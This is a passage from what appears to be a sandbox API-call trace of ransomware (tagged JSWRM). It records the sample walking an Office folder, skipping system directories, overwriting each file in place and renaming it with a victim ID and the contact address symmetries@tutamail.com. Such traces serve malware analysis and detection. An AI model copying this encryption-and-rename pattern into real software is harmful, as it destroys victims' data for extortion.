lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR50F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR50F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0119.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0119.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0119.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0119.787] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR50F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir50f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.788] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3714) returned 1 [0119.788] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe80) returned 0x24e1d8 [0119.788] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe80, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xe80, lpOverlapped=0x0) returned 1 [0119.792] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.792] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xe80, lpOverlapped=0x0) returned 1 [0119.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.793] CloseHandle (hObject=0x314) returned 1 [0119.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0119.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0119.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0119.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0119.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0119.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0119.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0119.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0119.793] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR50F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir50f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR50F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir50f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0119.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0119.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0119.794] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadb15e3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadb15e3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadb15e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4217, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR51B.GIF", cAlternateFileName="")) returned 1 [0119.794] lstrcmpiW (lpString1="PDIR51B.GIF", lpString2=".") returned 1 [0119.794] lstrcmpiW (lpString1="PDIR51B.GIF", lpString2="..") returned 1 [0119.794] lstrcmpiW (lpString1="PDIR51B.GIF", lpString2="...") returned 1 [0119.794] lstrcmpiW (lpString1="PDIR51B.GIF", lpString2="windows") returned -1 [0119.794] lstrcmpiW (lpString1="PDIR51B.GIF", lpString2="recovery") returned -1 [0119.794] lstrcmpiW (lpString1="PDIR51B.GIF", lpString2="perflogs") returned -1 [0119.794] lstrcmpiW (lpString1="PDIR51B.GIF", lpString2="documents and settings") returned 1 [0119.794] lstrcmpiW (lpString1="PDIR51B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.794] lstrcmpiW (lpString1="PDIR51B.GIF", lpString2="system volume information") returned -1 [0119.794] lstrcmpiW (lpString1="PDIR51B.GIF", lpString2="msocache") returned 1 [0119.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0119.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR51B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR51B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR51B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0119.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0119.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR51B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR51B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR51B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0119.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0119.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0119.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0119.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR51B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir51b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.795] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=16919) returned 1 [0119.795] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4210) returned 0x24e1d8 [0119.795] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x4210, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x4210, lpOverlapped=0x0) returned 1 [0119.798] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.798] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x4210, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x4210, lpOverlapped=0x0) returned 1 [0119.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.798] CloseHandle (hObject=0x314) returned 1 [0119.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0119.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0119.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0119.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0119.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0119.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0119.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0119.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0119.798] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR51B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir51b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR51B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir51b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0119.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0119.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0119.799] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadb15e3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadb15e3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadb15e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16a1, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR51F.GIF", cAlternateFileName="")) returned 1 [0119.799] lstrcmpiW (lpString1="PDIR51F.GIF", lpString2=".") returned 1 [0119.799] lstrcmpiW (lpString1="PDIR51F.GIF", lpString2="..") returned 1 [0119.799] lstrcmpiW (lpString1="PDIR51F.GIF", lpString2="...") returned 1 [0119.799] lstrcmpiW (lpString1="PDIR51F.GIF", lpString2="windows") returned -1 [0119.799] lstrcmpiW (lpString1="PDIR51F.GIF", lpString2="recovery") returned -1 [0119.800] lstrcmpiW (lpString1="PDIR51F.GIF", lpString2="perflogs") returned -1 [0119.800] lstrcmpiW (lpString1="PDIR51F.GIF", lpString2="documents and settings") returned 1 [0119.800] lstrcmpiW (lpString1="PDIR51F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.800] lstrcmpiW (lpString1="PDIR51F.GIF", lpString2="system volume information") returned -1 [0119.800] lstrcmpiW (lpString1="PDIR51F.GIF", lpString2="msocache") returned 1 [0119.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0119.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR51F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR51F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR51F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0119.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0119.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR51F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR51F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR51F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0119.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0119.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0119.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0119.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR51F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir51f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.801] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=5793) returned 1 [0119.801] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16a0) returned 0x24e1d8 [0119.801] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x16a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x16a0, lpOverlapped=0x0) returned 1 [0119.802] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.803] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x16a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x16a0, lpOverlapped=0x0) returned 1 [0119.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.803] CloseHandle (hObject=0x314) returned 1 [0119.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0119.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0119.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0119.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0119.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0119.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0119.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.803] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR51F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir51f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR51F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir51f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0119.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0119.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0119.804] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad8b362, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad8b362, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadb15e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c88, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR5B.GIF", cAlternateFileName="")) returned 1 [0119.804] lstrcmpiW (lpString1="PDIR5B.GIF", lpString2=".") returned 1 [0119.804] lstrcmpiW (lpString1="PDIR5B.GIF", lpString2="..") returned 1 [0119.804] lstrcmpiW (lpString1="PDIR5B.GIF", lpString2="...") returned 1 [0119.804] lstrcmpiW (lpString1="PDIR5B.GIF", lpString2="windows") returned -1 [0119.804] lstrcmpiW (lpString1="PDIR5B.GIF", lpString2="recovery") returned -1 [0119.804] lstrcmpiW (lpString1="PDIR5B.GIF", lpString2="perflogs") returned -1 [0119.804] lstrcmpiW (lpString1="PDIR5B.GIF", lpString2="documents and settings") returned 1 [0119.804] lstrcmpiW (lpString1="PDIR5B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.804] lstrcmpiW (lpString1="PDIR5B.GIF", lpString2="system volume information") returned -1 [0119.804] lstrcmpiW (lpString1="PDIR5B.GIF", lpString2="msocache") returned 1 [0119.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR5B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR5B.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR5B.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0119.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR5B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR5B.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR5B.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0119.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0119.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0119.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0119.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR5B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir5b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.805] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=19592) returned 1 